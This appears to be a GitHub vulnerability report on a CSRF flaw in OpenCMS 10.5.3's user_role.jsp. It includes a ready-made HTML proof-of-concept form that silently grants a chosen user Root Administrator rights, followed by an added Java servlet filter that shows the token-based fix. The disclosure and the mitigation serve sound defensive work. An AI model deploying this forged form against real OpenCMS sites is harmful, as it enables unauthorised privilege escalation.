Cross Site Request Forgery Vulnerability in OpenCMS 10.5.3 #586

Closed
@MrR3boot

Hi Team, I would like to report multiple CSRF vulnerabilities in the latest version. mitre.org assigned a new CVE for this vulnerability.

Description:

Cross-site request forgery (CSRF) vulnerability in opencms/system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of unspecified victims for requests that perform privilege escalation.

Steps to Reproduce:

  1. Send the crafted request below to a logged-in user who has Root Administrator level access.
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.146.131:8080/opencms/system/workplace/admin/accounts/user_role.jsp" method="POST">
      <input type="hidden" name="dialogtype" value="" />
      <input type="hidden" name="root" value="" />
      <input type="hidden" name="sortcol" value="" />
      <input type="hidden" name="preactiondone" value="" />
      <input type="hidden" name="oufqn" value="" />
      <input type="hidden" name="resource" value="" />
      <input type="hidden" name="userid" value="replace with actual user id of low privileged user." />
      <input type="hidden" name="closelink" value="&#37;2Fopencms&#37;2Fsystem&#37;2Fworkplace&#37;2Fviews&#37;2Fadmin&#37;2Fadmin&#45;main&#46;jsp&#37;3Fpath&#37;3D&#37;2Faccounts&#37;2Forgunit&#37;2Fusers&#37;26action&#37;3Dinitial" />
      <input type="hidden" name="framename" value="" />
      <input type="hidden" name="ispopup" value="" />
      <input type="hidden" name="originalparams" value="" />
      <input type="hidden" name="message" value="" />
      <input type="hidden" name="selitems" value="RoleRootAdmins" />
      <input type="hidden" name="title" value="" />
      <input type="hidden" name="style" value="new" />
      <input type="hidden" name="page" value="" />
      <input type="hidden" name="base" value="" />
      <input type="hidden" name="path" value="&#37;2Faccounts&#37;2Forgunit&#37;2Fusers&#37;2Fedit&#37;2Frole" />
      <input type="hidden" name="action" value="listmultiaction" />
      <input type="hidden" name="searchfilter" value="" />
      <input type="hidden" name="redirect" value="" />
      <input type="hidden" name="force" value="" />
      <input type="hidden" name="formname" value="lsre&#45;form" />
      <input type="hidden" name="listaction" value="ma" />
      <input type="hidden" name="listMultiAction" value="RoleRootAdmins" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  2. Once the logged-in user opens the URL, the form is submitted with the active session of the root administrator and the action is performed successfully.

Fix:

Implementing a random token in every state-changing request will mitigate the issue.

Affected Version:

10.5.3 release
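
One way to implement the random-token fix suggested in the report, shown as an added example that is not part of the original report and not OpenCMS's own code: a servlet filter that rejects any POST, such as the forged `user_role.jsp` submission above, that does not carry the token stored in the victim's session. The class name, the `csrfToken` session attribute and the `csrftoken` form field are hypothetical, and the `javax.servlet` API and a filter mapping over the workplace JSPs are assumed.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import javax.servlet.*;
import javax.servlet.http.*;

// Added example (hypothetical names): synchronizer-token check for state-changing requests.
public class CsrfTokenFilter implements Filter {
    static final String ATTR = "csrfToken";   // assumed session attribute name
    static final String PARAM = "csrftoken";  // assumed hidden form field name
    private static final SecureRandom RNG = new SecureRandom();

    // Call while rendering a form; emit the result as a hidden input named PARAM.
    public static String tokenFor(HttpSession session) {
        String token = (String) session.getAttribute(ATTR);
        if (token == null) {
            byte[] raw = new byte[32];         // 256 bits from a CSPRNG
            RNG.nextBytes(raw);
            token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
            session.setAttribute(ATTR, token);
        }
        return token;
    }

    @Override public void init(FilterConfig cfg) {}
    @Override public void destroy() {}

    @Override
    public void doFilter(ServletRequest rq, ServletResponse rs, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) rq;
        HttpServletResponse res = (HttpServletResponse) rs;
        // Assumption: state changes arrive as POST. If a handler also acts on GET
        // parameters, the same check has to cover those requests.
        if ("POST".equals(req.getMethod())) {
            HttpSession session = req.getSession(false);
            String expected = session == null ? null : (String) session.getAttribute(ATTR);
            String sent = req.getParameter(PARAM);
            // A cross-site form cannot read the session's token, so it fails here.
            if (expected == null || sent == null || !MessageDigest.isEqual(
                    expected.getBytes(StandardCharsets.UTF_8),
                    sent.getBytes(StandardCharsets.UTF_8))) {
                res.sendError(HttpServletResponse.SC_FORBIDDEN, "Missing or invalid CSRF token");
                return;
            }
        }
        chain.doFilter(req, res);
    }
}
```

The token only helps if it is never placed in a URL, where it can leak through the Referer header or logs, and if every role-changing form renders it via `tokenFor`.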
